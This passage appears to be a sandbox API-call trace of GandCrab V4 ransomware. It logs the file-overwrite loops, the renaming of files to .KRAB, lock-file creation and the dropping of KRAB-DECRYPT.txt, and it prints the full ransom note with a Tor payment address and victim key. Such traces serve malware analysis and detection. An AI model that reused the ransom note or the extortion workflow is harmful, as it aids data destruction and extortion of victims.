lpNewFilePointer=0xffffffff) returned 1 [0054.482] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.484] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.520] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.520] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.522] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.535] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.535] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.581] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.608] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.609] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.612] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.631] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.631] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.651] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.666] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.666] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.668] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.682] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.682] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.684] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.699] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.699] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.701] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.718] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.718] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.720] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.779] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.779] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.781] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.906] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.906] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.908] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.922] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.922] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.924] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.938] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.938] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.940] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.961] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.961] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.964] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0xc7e13, lpOverlapped=0x0) returned 1 [0054.975] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff381ed, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.975] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0xc7e13, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0xc7e13, lpOverlapped=0x0) returned 1 [0054.978] WriteFile (in: hFile=0x320, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0054.978] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0054.982] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0054.985] CloseHandle (hObject=0x320) returned 1 [0055.354] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.355] MoveFileW (lpExistingFileName="C:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "c:\\recovery\\windowsre\\winre.wim"), lpNewFileName="C:\\Recovery\\WindowsRE\\Winre.wim.KRAB" (normalized: "c:\\recovery\\windowsre\\winre.wim.krab")) returned 1 [0055.355] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.356] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0 [0055.356] FindClose (in: hFindFile=0xf8a4c8 | out: hFindFile=0xf8a4c8) returned 1 [0055.356] CloseHandle (hObject=0x368) returned 1 [0055.356] FindNextFileW (in: hFindFile=0xf8a488, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0 [0055.356] FindClose (in: hFindFile=0xf8a488 | out: hFindFile=0xf8a488) returned 1 [0055.356] CloseHandle (hObject=0x360) returned 1 [0055.356] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0055.356] lstrcmpW (lpString1="swapfile.sys", lpString2=".") returned 1 [0055.356] lstrcmpW (lpString1="swapfile.sys", lpString2="..") returned 1 [0055.357] lstrcatW (in: lpString1="C:\\", lpString2="swapfile.sys" | out: lpString1="C:\\swapfile.sys") returned="C:\\swapfile.sys" [0055.357] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.357] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\swapfile.sys.KRAB") returned 20 [0055.357] lstrlenW (lpString="C:\\swapfile.sys") returned 15 [0055.357] lstrlenW (lpString=".sys") returned 4 [0055.357] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.358] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".sys ") returned 5 [0055.358] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.358] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.358] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0055.358] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0055.358] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0055.358] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0055.358] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0055.358] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.359] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.359] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.359] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.359] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.359] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.359] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.360] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\System Volume Information\\\\KRAB-DECRYPT.txt") returned 46 [0055.360] CreateFileW (lpFileName="C:\\System Volume Information\\\\KRAB-DECRYPT.txt" (normalized: "c:\\system volume information\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.360] GetLastError () returned 0x5 [0055.360] GetLastError () returned 0x5 [0055.360] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.361] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.361] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2, wMilliseconds=0x237)) [0055.361] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.361] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.361] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.361] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\System Volume Information\\d2ca4a08d2ca4dee3d.lock") returned 52 [0055.361] CreateFileW (lpFileName="C:\\System Volume Information\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\system volume information\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0xffffffff [0055.362] GetLastError () returned 0x5 [0055.362] GetLastError () returned 0x5 [0055.362] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.362] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.362] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0055.362] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*" | out: lpString1="C:\\System Volume Information\\*") returned="C:\\System Volume Information\\*" [0055.362] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xffffffff [0055.362] CloseHandle (hObject=0xffffffff) returned 1 [0055.363] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0055.363] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0055.363] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0055.363] lstrcatW (in: lpString1="C:\\", lpString2="Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0055.363] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0055.363] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.363] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.363] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.363] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.363] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.363] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.363] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.364] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\\\KRAB-DECRYPT.txt") returned 26 [0055.364] CreateFileW (lpFileName="C:\\Users\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.364] GetLastError () returned 0x50 [0055.364] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.364] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.364] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2, wMilliseconds=0x23b)) [0055.365] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.365] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.365] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.365] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\d2ca4a08d2ca4dee3d.lock") returned 32 [0055.365] CreateFileW (lpFileName="C:\\Users\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x360 [0055.366] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.366] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.366] lstrlenW (lpString="C:\\Users\\") returned 9 [0055.366] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*" | out: lpString1="C:\\Users\\*") returned="C:\\Users\\*" [0055.366] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xfbe060 [0055.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.366] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0055.367] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.367] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0055.367] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0055.367] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0055.367] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0055.367] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0055.367] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.367] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.367] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0055.367] lstrcmpW (lpString1="CIiHmnxMn6Ps", lpString2=".") returned 1 [0055.368] lstrcmpW (lpString1="CIiHmnxMn6Ps", lpString2="..") returned 1 [0055.368] lstrcatW (in: lpString1="C:\\Users\\", lpString2="CIiHmnxMn6Ps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps") returned="C:\\Users\\CIiHmnxMn6Ps" [0055.368] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\") returned="C:\\Users\\CIiHmnxMn6Ps\\" [0055.368] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.368] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.368] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.368] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.368] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.368] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.368] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.369] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\\\KRAB-DECRYPT.txt") returned 39 [0055.369] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0055.369] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+